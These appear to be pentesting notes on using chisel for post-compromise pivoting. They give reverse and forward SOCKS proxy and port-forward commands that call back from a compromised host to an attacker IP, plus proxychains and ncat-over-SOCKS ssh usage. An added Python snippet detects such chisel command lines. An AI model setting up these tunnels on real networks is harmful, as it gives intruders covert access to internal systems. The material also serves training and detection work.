chisel

  • can be used to set up a tunneled proxy or port forward

  • doesn't require ssh

  • copy the files from GitHub and extract them with gunzip *

  • there must be an appropriate copy of the chisel binary on both the attacking machine and compromised server

  • Reverse Socks Proxy

    • on the attacking machine, set up a listener on your chosen port

      ./chisel server -p LISTEN_PORT --reverse &

    • on the compromised host do:

      ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

  • Forward Socks

    • rarer than reverse proxies

    • on the compromised host use:

      ./chisel server -p LISTEN_PORT --socks5

    • on the attacking box

      ./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

  • Remote Port Forward

    • for when we connect back from a compromised target to create the forward

    • on the attacking machine

      ./chisel server -p LISTENPORT --reverse &

    • from the compromised server

      ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

  • Local Port Forward

    • on the compromised server

      ./chisel server -p LISTEN_PORT

    • on the attacking machine

      ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
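
Seen from the monitoring side, each of the four modes above leaves a recognisable command line. The following is an added example (not part of the original notes or of the chisel project) that classifies process-creation command lines by the remote-spec forms listed above; the sample events, addresses and function names are constructed for illustration, and it assumes no client flags that take a separate value.

```python
import re

# Constructed process-creation command lines (sample data, not real telemetry).
SAMPLE_EVENTS = [
    r".\chisel.exe client 192.0.2.10:8000 R:socks",
    "./chisel server -p 8000 --reverse",
    "/tmp/upd client 192.0.2.10:4444 R:2222:10.0.0.5:22",  # renamed binary
    "./chisel client 10.0.0.9:9001 1080:socks",
    "./chisel client 10.0.0.9:9001 8080:10.0.0.7:80",
    "mysql --host db.internal --port 3306",  # unrelated process
]

CHISEL_NAME = re.compile(r"(^|[\\/])chisel(\.exe)?$", re.IGNORECASE)
HOSTPORT = re.compile(r"^[^\s:]+:\d+$")

def classify_remote(spec):
    """Map one remote spec, in the forms used in these notes, to a tunnel type."""
    parts = spec.split(":")
    reverse = parts[0] == "R"
    if reverse:
        parts = parts[1:]
    if parts and parts[-1] == "socks" and len(parts) <= 2:
        return "reverse SOCKS proxy" if reverse else "forward SOCKS proxy"
    if len(parts) == 3 and parts[0].isdigit() and parts[2].isdigit():
        return "remote port forward" if reverse else "local port forward"
    return None

def classify_cmdline(cmdline):
    """Return (named_chisel, findings); the file name alone is a weak signal."""
    argv = [a.strip("\"'") for a in cmdline.split()]
    named = bool(argv) and bool(CHISEL_NAME.search(argv[0]))
    findings = []
    if "client" in argv[1:]:
        # Positional args after "client": server address, then remote specs.
        rest = [a for a in argv[argv.index("client") + 1:] if not a.startswith("-")]
        if rest and HOSTPORT.match(rest[0]):
            findings = [t for t in map(classify_remote, rest[1:]) if t]
    elif "server" in argv[1:]:
        # Go's flag parser accepts -reverse and --reverse alike.
        flags = {a.lstrip("-") for a in argv[1:] if a.startswith("-")}
        if "reverse" in flags:
            findings.append("server accepting reverse tunnels")
        if "socks5" in flags:
            findings.append("server with SOCKS5 enabled")
    return named, findings

def triage(events):
    """Keep only the command lines that matched, with their classification."""
    return [(e, *classify_cmdline(e)) for e in events if classify_cmdline(e)[1]]
```

Calling triage(SAMPLE_EVENTS) returns the five tunnel-related events, including the renamed binary, which is matched on argument shape rather than file name.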

Start the chisel server on Kali

./chisel server -p 8000 -reverse

Upload and start the client on the Windows machine

.\chisel.exe client <kali ip>:8000 R:socks

Configure proxychains:

sudo vim /etc/proxy

sudo vim /etc/proxychains4.conf

Comment out the existing socks4 127.0.0.1 line and add the line below

socks5 127.0.0.1 1080

proxychains4 commandtoexecute

or

ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
